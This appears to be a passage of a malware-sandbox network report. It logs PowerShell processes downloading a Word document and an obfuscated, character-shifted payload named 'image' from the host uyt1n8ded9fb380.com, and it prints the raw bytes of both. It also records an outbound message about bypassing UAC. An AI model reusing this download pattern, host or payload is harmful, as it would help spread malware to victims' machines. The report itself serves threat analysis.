                                                                                      2024-11-08 09:45:54 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                      Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                      2024-11-08 09:45:55 UTC934INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:55 GMT
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5XXv1mBB5MYFG20sUE%2BkgBJ%2Bvj2JFZlRucIsXnHb39QIj%2BiZig37tWt3RsGh7z%2FNv1ZdEbs4SIpCCz9y1SrAYTuQ3ojbwKdisnri2RmuRv7tb4mcR%2B0EEUqzANPDfWdo8PZ6ZS3NIVm"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=14731&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1464&recv_bytes=2986&delivery_rate=25809&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2076b710f3a-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102081&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1011&delivery_rate=37460&cwnd=252&unsent_bytes=0&cid=76b613e43e1bcbfe&ts=823&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.11.3049760172.67.137.624438464C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:54 UTC394OUTGET /file2/703e90d03436817ef0c550cdab0733b4e7b1e8dce7d6d7e6af8c26ad2c61f0372b215c6f1df310b2f1c2891118dcdea15d56ca524f9e1697046cd75246b4885b7b701d1f128fa7947395230ce4dece18bbf7de42dab4380176a133a711ef9bd142ddf032fed528aee1e6eb8604c5d196 HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Connection: Keep-Alive
                                                                                      2024-11-08 09:45:55 UTC1064INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:45:55 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 13823
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUd1%2FJsbjeha7L1dLLy2AEAOqZ%2FuY3v9JFgjBv%2Ffzphjq18BagO8exYxbB5g0SVIbpvDQ4evawUXqSEnZGh8ka0hbFcnHc1RH1%2BluyYqyno1ZL7avVpsGw0FdjYE3EA1g87L%2BlYomsJr"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1583&sent=29686&recv=15449&lost=0&retrans=0&sent_bytes=41252542&recv_bytes=143574&delivery_rate=53947214&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a2079b217274-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=102400&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1008&delivery_rate=37298&cwnd=249&unsent_bytes=0&cid=eb56e1c7e0277c0f&ts=811&x=0"
                                                                                      2024-11-08 09:45:55 UTC305INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 df a4 d2 6c 5a 01 00 00 20 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: PK!lZ [Content_Types].xml (
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: c5 89 85 2c 09 a1 09 89 2f fb 7c 66 5c 12 5a fe e7 8a e6 19 3f 36 ef 21 59 b4 5f e1 6f 1b 9c 5d 41 f3 01 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 dd 68 eb da b0 09 00 00 ff 25 00 00 11 00 00 00 77 6f 72 64 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c bc 5a db 8e db 38 12 7d 5f 60 ff 81 f0 cb ec 02 dd 6d 5d 7c 6b 63 3a 03 b7 2f 99 c6 62 90 c6 24 8b 7d a6 25 da 52 22 89 5a 92 72 b7 f3 f5 7b 8a 92 6c b9 ed 0c d4 ce da 01 12 db 92 78 48 56 d5 a9 3a 45 e5 d7 df 5e d3 84 6d 84 d2 b1 cc 1e 3a ee 9d d3 61 22 0b 64 18 67 eb 87 ce bf bf 2c 6e 47 1d a6 0d cf 42 9e c8 4c 3c 74 b6 42 77 7e fb f0 f7 bf fd fa 32 0e 65 50 a4 22 33 0c 10 99 1e bf e4 c1 43 27 32 26 1f 77 bb 3a 88 44 ca f5 5d 1a 07 4a 6a b9 32 77 81 4c bb 72 b5 8a 03 d1 7d 91 2a ec 7a 8e eb d8
                                                                                      Data Ascii: ,/|f\Z?6!Y_o]APK!h%word/document.xmlZ8}_`m]|kc:/b$}%R"Zr{lxHV:E^m:a"dg,nGBL<tBw~2eP"3C'2&w:D]Jj2wLr}*z
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: 9e e4 26 4e f1 fc 69 ae dd b1 c7 6d 39 f4 bb 65 6b 11 82 43 81 00 80 06 55 4d 49 35 54 30 db fd d1 8d 54 18 85 49 6e 2c 1f 6a da 67 ba 40 55 2a 79 bb a7 31 57 a2 26 3c 9a 75 81 c5 96 05 4c ac 56 25 73 5b 95 30 df 1f ba ee bd 7f 45 4e 78 93 fb 85 33 bb 14 0b 1b ee 9e 22 2f 5b 29 31 a7 bc 99 90 e1 c7 8d 74 8a 2c 13 d4 4f 18 c1 d3 46 7a 0d 05 dc 93 91 c7 36 b1 2e 78 02 13 93 c6 01 c8 2e e7 92 68 b0 3f 48 fe 40 67 c1 f8 d6 3f 70 14 d4 96 81 bb 6c 6e 0d 49 90 40 9d d4 9e b7 4a a7 0e 95 3b b6 50 12 f3 6e c5 2d 54 58 10 ed 27 b4 51 86 b8 c0 77 ab a9 52 34 28 76 be c3 82 d2 dc c2 2e 0d 8b 2c a2 50 d2 6c a9 68 a5 00 ac 8e c3 ec c2 6d 32 b5 c2 90 07 54 d9 5b 25 ce e9 68 32 e8 cd 7b 57 cc 09 bd de 6c e8 0f 67 97 0f 92 2f 75 ad 6c e6 c9 1f 29 ce da 71 b0 bb 96 79 14
                                                                                      Data Ascii: &Nim9ekCUMI5T0TIn,jg@U*y1W&<uLV%s[0ENx3"/[)1t,OFz6.x.h?H@g?plnI@J;Pn-TX'QwR4(v.,Plhm2T[%h2{Wlg/ul)qy
                                                                                      2024-11-08 09:45:55 UTC517INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 92 cb 6a c3 30 10 45 f7 85 fe 83 98 7d 2d 3b 7d 50 42 e4 6c 4a 21 db d6 fd 00 45 1e 3f a8 2c 09 cd f4 e1 bf af 48 49 eb d0 60 ba f0 72 ae 98 73 cf 80 36 db cf c1 8a 77 8c d4 7b a7 a0 c8 72 10 e8 8c af 7b d7 2a 78 a9 1e af ee 41 10 6b 57 6b eb 1d 2a 18 91 60 5b 5e 5e 6c 9e d0 6a 4e 4b d4 f5 81 44 a2 38 52
                                                                                      Data Ascii: j0E}-;}PBlJ!E?,HI`rs6w{r{*xAkWk*`[^^ljNKD8R
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: 49 33 2d f5 c4 8f 5d 83 09 bb 82 55 3f be aa fe ba aa ba ba 34 73 e1 e2 fd 98 3a 47 98 0b c2 92 8e 5b 3d 57 71 1d 9c 8c d8 98 24 61 c7 bd 7d 30 2c b5 5c 47 48 94 8c 11 65 09 ee b8 0b 2c dc 8b 3b 9f 7f 76 01 9d 97 11 8e b1 03 f2 89 38 8f 3a 6e 24 e5 ec 7c b9 2c 46 30 8c c4 39 36 c3 09 cc 4d 18 8f 91 84 2e 0f cb 63 8e 8e 41 6f 4c cb b5 4a a5 51 8e 11 49 5c 27 41 31 a8 bd 31 99 90 11 76 0e 94 4a 77 67 a5 7c 40 e1 5f 22 85 1a 18 51 be af 54 63 43 42 63 c7 d3 aa fa 12 0b 11 50 ee 1c 21 da 71 61 9d 31 3b 3e c0 f7 a5 eb 50 24 24 4c 74 dc 8a fe 73 cb 3b 17 ca 6b 21 2a 0b 64 73 72 43 fd b7 94 5b 0a 8c a7 35 2d c7 c3 c3 b5 a0 e7 f9 5e a3 bb d6 af 01 54 6e e3 06 cd 41 63 d0 58 eb d3 00 34 1a c1 4e 53 2e a6 ce 66 2d f0 96 d8 1c 28 6d 5a 74 f7 9b fd 7a d5 c0 e7 f4 d7
                                                                                      Data Ascii: I3-]U?4s:G[=Wq$a}0,\GHe,;v8:n$|,F096M.cAoLJQI\'A11vJwg|@_"QTcCBcP!qa1;>P$$Lts;k!*dsrC[5-^TnAcX4NS.f-(mZtz
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: df 92 1d 51 44 67 11 5a de 28 f9 64 9e c2 75 7b 4d 27 b7 0f cd 74 73 57 66 7f b9 99 c3 50 39 e9 c4 b7 ee db 85 d4 44 2e 69 16 5c 20 ea d6 b4 e7 8f 8f 77 c9 e7 58 65 79 df 60 95 a6 ee cd 5c d7 5e e5 ba a2 5b e2 e4 17 42 8e 5a b6 98 41 4d 31 b6 50 cb 46 4d 6a a7 58 10 e4 96 5b 87 66 d1 1d 71 da b7 c1 66 d4 aa 0b 62 55 57 ea de d6 8b 6d 76 78 0f 22 bf 0f d5 ea 9c 4a a1 a9 c2 af 16 8e 82 d5 2b c9 34 13 e8 d1 55 76 b9 2f 9d 39 27 1d f7 41 c5 ef 7a 41 cd 0f 4a 95 96 3f 28 79 75 af 52 6a f9 dd 7a a9 eb fb f5 ea c0 af 56 fa bd da 43 30 8a 8c e2 aa 9f ae 3d 84 1f fb 74 b1 7c 6f af c7 b7 de dd c7 ab 52 fb dc 88 c5 65 a6 eb e0 b2 16 d6 ef ee ab b5 e2 77 f7 0e 01 cb 3c 68 d4 86 ed 7a bb d7 28 b5 eb dd 61 c9 eb f7 5a a5 76 d0 e8 95 fa 8d a0 d9 1f f6 03 bf d5 1e 3e 74
                                                                                      Data Ascii: QDgZ(du{M'tsWfP9D.i\ wXey`\^[BZAM1PFMjX[fqfbUWmvx"J+4Uv/9'AzAJ?(yuRjzVC0=t|oRew<hz(aZv>t
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: a7 59 29 8a 7b 33 9f d3 56 9e 5e 0e c6 97 d1 6d da c2 43 3b d7 b4 ed 21 70 ee 9f f1 ea 06 29 5c 3a cc 9b 0e 5b d3 bf ae 07 37 c3 51 3a 8b fa f1 70 36 ee a7 37 c9 6d 7f 32 1f 4f fa f3 74 70 7d 19 c1 cd 9e 8f c6 7f bb 4b ea ff 68 5c fd 03 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 cd e2 8d d9 a5 0b 00 00 61 73 00 00 0f 00 00 00 77 6f 72 64 2f 73 74 79 6c 65 73 2e 78 6d 6c bc 9d 5b 53 e3 3a 12 c7 df b7 6a bf 83 2b 4f bb 0f 33 e1 1a 66 a8 c3 9c 02 66 58 a8 05 0e 67 02 3b cf 8a ad 10 2d b6 95 f5 85 cb 7e fa 95 64 3b 51 68 cb 71 cb bd bc 40 6e fd 93 ac bf fe 6d b5 2f c9 6f bf bf 26 71 f0 cc b3 5c c8 f4 64 b4 fb 79 67 14 f0 34 94 91 48 1f 4f 46 0f f7 17 9f be 8c 82 bc 60 69 c4 62 99 f2 93 d1 1b cf 47 bf 7f fb eb 5f 7e 7b 39 ce 8b b7 98 e7 81 02
                                                                                      Data Ascii: Y){3V^mC;!p)\:[7Q:p67m2Otp}Kh\PK!asword/styles.xml[S:j+O3ffXg;-~d;Qhq@nm/o&q\dyg4HOF`ibG_~{9
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: bf b9 0e ee e5 52 97 99 7a 60 68 80 67 b2 28 64 42 c6 ac 8f 04 fe ed 17 9f fd 9d a6 83 a7 aa 08 4e df 88 b6 f6 94 e8 f0 90 81 9d 0b 82 9d 4c 45 92 11 11 49 2d 33 45 2a 48 f6 a1 86 f7 4f fe 36 93 2c 8b 68 68 77 19 af ae 29 2a 38 11 71 ca 92 65 b5 e8 20 f0 96 ca 8b 2f 2a ff 10 ac 86 0c ef 5f 2c 13 fa b8 10 95 a9 ee 49 60 d6 61 c3 bc 9c fd 9b 87 c3 53 dd ad 0c 48 8e 0c fd 51 16 e6 f8 a3 59 ea 9a 68 3a dc f0 65 c2 06 6e f8 12 c1 a8 a9 76 0f 7a fe 12 6c ec 06 6e f8 c6 6e e0 a8 36 f6 3c 66 79 2e 9c a7 50 bd 79 54 9b db f0 a8 b7 77 78 f1 57 f3 64 2c b3 79 19 d3 0d 60 03 24 1b c1 06 48 36 84 32 2e 93 34 a7 dc 62 c3 23 dc 60 c3 a3 de 5e c2 29 63 78 04 87 e4 0c ef 1f 99 88 c8 c4 30 30 2a 25 0c 8c 4a 06 03 a3 d2 c0 c0 48 05 18 7e 85 8e 05 1b 7e 99 8e 05 1b 7e ad 4e
                                                                                      Data Ascii: Rz`hg(dBNLEI-3E*HO6,hhw)*8qe /*_,I`aSHQYh:envzlnn6<fy.PyTwxWd,y`$H62.4b#`^)cx00*%JH~~~N
                                                                                      2024-11-08 09:45:55 UTC1369INData Raw: dd 04 2f a9 71 d5 52 a7 d4 b8 6a a9 53 6a 5c b5 e4 96 1a 57 2d b5 49 8d ab 96 da a4 c6 55 4b 6d 52 0f dc 21 3b 31 fe 52 e3 aa a5 4e a9 71 d5 92 5b 6a 5c b5 d4 26 35 ae 5a 6a 93 1a 57 2d b5 49 8d ab 96 9c 52 e3 aa a5 4e a9 71 d5 52 a7 d4 b8 6a c9 2d 35 ae 5a 6a 93 1a 57 2d b5 49 8d ab 96 da a4 c6 55 4b 4e a9 71 d5 52 a7 d4 b8 6a a9 53 6a 5c b5 74 a3 42 04 c1 57 40 4d 13 96 15 01 dd f7 c5 5d b2 7c 51 b0 e1 5f 4e f8 90 66 3c 97 f1 33 8f 02 da 4d bd 46 6d e5 f8 65 e3 e7 af 34 db fc da 9f fa 7c a1 c6 4c 7f 03 ba 75 bb 52 54 7d 03 6c 0d 34 1f bc 8a 56 3f 53 a5 83 75 4f 82 fa 07 c1 ea 97 4d 87 eb d3 b5 55 8b 26 10 36 15 2e 54 5b 61 fd dd 55 8e a6 ea ef a0 5d dd 44 65 be 81 f6 7d c3 8e 2f aa 35 1d 59 4f c0 e6 d3 f5 90 ae c7 ab fa dc c6 68 75 f6 bb d0 13 be a3 cf
                                                                                      Data Ascii: /qRjSj\W-IUKmR!;1RNq[j\&5ZjW-IRNqRj-5ZjW-IUKNqRjSj\tBW@M]|Q_Nf<3MFme4|LuRT}l4V?SuOMU&6.T[aU]De}/5YOhu


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.11.3049764172.67.137.624438756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-08 09:45:59 UTC394OUTGET /file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c7 HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                      Host: uyt1n8ded9fb380.com
                                                                                      Connection: Keep-Alive
                                                                                      2024-11-08 09:46:00 UTC1068INHTTP/1.1 200 OK
                                                                                      Date: Fri, 08 Nov 2024 09:46:00 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 12142
                                                                                      Connection: close
                                                                                      content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQLC5lUGNhcHOV%2BzOxR16pBDg23mk6t%2BQSy9waySci8KbVxko8RIxNN%2Bsx3WoWwFSpZEMbXkjbntHM%2BjH2%2Br9P0pebMSHr5Uo5%2F1tH9K0VC2RqTJRBZwC6OehvFuWEwU2cyqHkJ40ba5"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1553&sent=29709&recv=15474&lost=0&retrans=0&sent_bytes=41269049&recv_bytes=164713&delivery_rate=53947214&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      X-Powered-By: ARR/3.0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8df4a222fb985e6e-EWR
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=104116&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1008&delivery_rate=35447&cwnd=247&unsent_bytes=0&cid=ec8d49baec2e0302&ts=821&x=0"
                                                                                      2024-11-08 09:46:00 UTC301INData Raw: 25 72 77 66 70 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 56 65 69 57 30 6d 77 52 6a 65 6a 62 33 48 78 52 6c 69 68 53 49 43 4d 57 55 43 4e 57 57 53 46 54 6a 57 54 57 54 34 50 55 46 30 35 63 46 4b 75 5b 45 43 69 50 31 47 31 56 6b 4f 53 5b 31 30 45 60 31 34 45 60 54 47 6f 52 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 34 68 53 7b 6d 71 56 57 65 32 4f 6d 4f 72 55 6a 53 56 53 59 69 57 54 6a 54 79 53 47 53 34 50 59 4b 50 54 31 47 71 55 47 4c 76 65 44 79 55 4c 49 53 4c 54 7b 43 31 55 47 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43
                                                                                      Data Ascii: %rwfpq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#PVeiW0mwRjejb3HxRlihSICMWUCNWWSFTjWTWT4PUF05cFKu[ECiP1G1VkOS[10E`14E`TGoRTOBO1SSc3eKP1GoRTOC[1mETl4hS{mqVWe2OmOrUjSVSYiWTjTySGS4PYKPT1GqUGLveDyULISLT{C1UGOKO1SSc3eKP1GoRTOC
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 4f 43 5b 31 6d 45 50 56 75 5b 63 55 6d 73 5b 57 4f 43 4e 54 6d 45 54 6c 34 68 53 7b 6d 71 56 57 65 32 4f 6d 4f 72 55 6a 53 56 53 59 69 57 54 6a 54 79 53 47 53 34 50 6b 69 4b 53 54 34 33 58 6c 34 60 63 46 4f 74 54 6d 57 68 64 55 47 4d 58 7b 48 34 65 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 54 30 62 30 4c 6c 48 78 65 46 79 4c 57 6c 53 72 56 56 79 4a 63 46 4f 58 57 6c 79 6b 4c 30 47 6f 55 47 5b 56 64 56 47 55 50 56 75 6a 56 44 71 76 52 54 4c 79 55 6d 71 58 54 6c 38 68 4c 6d 47 6f 57 54 62 34 64 6c 53 45 50 59 53 55 53 30 5b 6e 56 6a 65 56 64 56 4f 34 50 56 75 69 53 30 5b 6e 56 6a 65 56 64 56 4f 34 50 59 53 53 63 55 6d 73 5b 57 4f 43 60 30 6d 75 4e 56 75 6d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53
                                                                                      Data Ascii: OC[1mEPVu[cUms[WOCNTmETl4hS{mqVWe2OmOrUjSVSYiWTjTySGS4PkiKST43Xl4`cFOtTmWhdUGMX{H4eT82LDuKP1GoRTOC[1mEPVeKP1GoT0b0LlHxeFyLWlSrVVyJcFOXWlykL0GoUG[VdVGUPVujVDqvRTLyUmqXTl8hLmGoWTb4dlSEPYSUS0[nVjeVdVO4PVuiS0[nVjeVdVO4PYSScUms[WOC`0muNVumTUCMRTOC[1mEPVeKP1H4S
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 45 60 54 47 6f 52 54 4f 43 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 5b 46 79 6a 50 31 48 76 58 54 65 57 5b 33 53 49 57 6f 53 6b 53 7b 6d 34 56 57 69 4a 4f 54 6d 49 56 6f 5b 68 53 30 4b 72 58 33 6d 42 65 30 6d 58 54 6c 38 44 54 56 38 6f 52 54 4f 43 5b 31 71 48 54 6c 79 68 56 44 4b 49 58 6b 4b 35 60 30 71 58 52 56 65 50 54 31 4b 68 57 55 4f 72 64 6c 53 49 57 6f 53 4c 60 33 79 50 55 46 79 42 60 46 53 49 60 46 53 51 60 6f 43 48 56 6d 69 52 57 57 71 59 4c 59 65 57 53 31 58 76 58 54 4f 6f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 55 6f 5b 68 57 31 71 76 58 6c 30 57 5b 33 53 49 60 46 79 4b 52 47 4b 72 58 6d 69 43 5b 30 71 75 4e 59 4f 60 53 30 5b 34 52 54 69 42 60 46 53 49 5b 33 65 5b 57 7b 57 73 52 54 65 60 62 46 4b 49 57 56
                                                                                      Data Ascii: E`TGoRTOCbDSSc14E`TGoRTOC`jmG[FyjP1HvXTeW[3SIWoSkS{m4VWiJOTmIVo[hS0KrX3mBe0mXTl8DTV8oRTOC[1qHTlyhVDKIXkK5`0qXRVePT1KhWUOrdlSIWoSL`3yPUFyB`FSI`FSQ`oCHVmiRWWqYLYeWS1XvXTOobDSSc14E`TGoRTOC`jmGUo[hW1qvXl0W[3SI`FyKRGKrXmiC[0quNYO`S0[4RTiB`FSI[3e[W{WsRTe`bFKIWV
                                                                                      2024-11-08 09:46:00 UTC1369INData Raw: 5b 33 47 58 55 56 65 69 57 7b 57 37 5b 44 65 46 62 33 4b 49 57 6c 75 44 54 56 38 73 58 6b 4f 52 63 30 71 58 52 6a 4b 68 63 6d 4b 76 5b 46 30 72 64 56 53 58 55 56 65 50 54 31 4b 48 56 6d 69 53 65 47 58 78 4c 59 43 54 4c 6a 71 79 56 6d 65 4e 4c 44 6d 45 4c 54 38 5b 57 7b 47 72 58 7b 4f 42 60 47 6a 78 57 56 65 4b 63 44 71 33 58 6b 4f 52 58 30 54 78 57 6c 71 6a 56 44 71 76 5b 44 69 72 53 47 71 59 4f 55 43 60 56 44 6d 34 52 56 6d 43 65 47 44 78 64 46 69 6b 4c 31 30 6f 52 56 75 46 65 56 53 49 63 45 4b 69 56 44 6e 79 58 7b 47 42 64 56 48 78 54 6b 47 5b 4c 30 47 71 52 54 69 32 5b 30 58 78 60 46 79 6b 63 57 57 31 57 45 4b 4a 62 57 71 59 55 6b 43 4b 52 49 4f 6f 52 6a 58 35 65 57 71 49 63 49 71 6b 53 32 69 6e 5b 57 54 30 60 46 4b 59 57 56 65 4c 57 7b 57 72 52 54 4f
                                                                                      Data Ascii: [3GXUVeiW{W7[DeFb3KIWluDTV8sXkORc0qXRjKhcmKv[F0rdVSXUVePT1KHVmiSeGXxLYCTLjqyVmeNLDmELT8[W{GrX{OB`GjxWVeKcDq3XkORX0TxWlqjVDqv[DirSGqYOUC`VDm4RVmCeGDxdFikL10oRVuFeVSIcEKiVDnyX{GBdVHxTkG[L0GqRTi2[0Xx`FykcWW1WEKJbWqYUkCKRIOoRjX5eWqIcIqkS2in[WT0`FKYWVeLW{WrRTO
                                                                                      2024-11-08 09:46:00 UTC517INData Raw: 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 30 69 57 32 69 72 54 56 34 72 4c 47 71 58 55 56 65 50 54 31 4b 68 57 55 4f 72 64 6c 53 49 57 6f 53 4c 60 33 79 50 55 46 75 60 62 46 4b 49 57 6c 53 51 60 6f 43 55 56 6d 65 46 60 30 47 59 64 49 4f 53 63 6c 76 76 56 6d 69 4f 63 31 71 47 63 49 57 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 34 50 6a 4b 6b 52 44 4b 7b 5b 57 4f 42 56 57 50 79 52 56 65 60 57 7b 57 70 58 33 34 72 65 33 53 49 63 49 5b 68 60 55 6d 73 56 6d 65 4e 64 56 57 58 50 6b 43 69 57 7b 6d 30 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 60 65 6c 4f 71 50 56 38 4a 53 33 75 6f 54 47 4f 43 65 31 38 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 56 6f 43 68
                                                                                      Data Ascii: 1GoRTOC[1mETl0iW2irTV4rLGqXUVePT1KhWUOrdlSIWoSL`3yPUFu`bFKIWlSQ`oCUVmeF`0GYdIOSclvvVmiOc1qGcIWkRGXvTl0rb0qVPlijS3evSGGwUjOqPVeKP1GoRTOC[1m4PjKkRDK{[WOBVWPyRVe`W{WpX34re3SIcI[h`UmsVmeNdVWXPkCiW{m0SGGw[1mEPVeKP1GoRTe`elOqPV8JS3uoTGOCe184PVuiT1G1XjiS[1qIVoCh
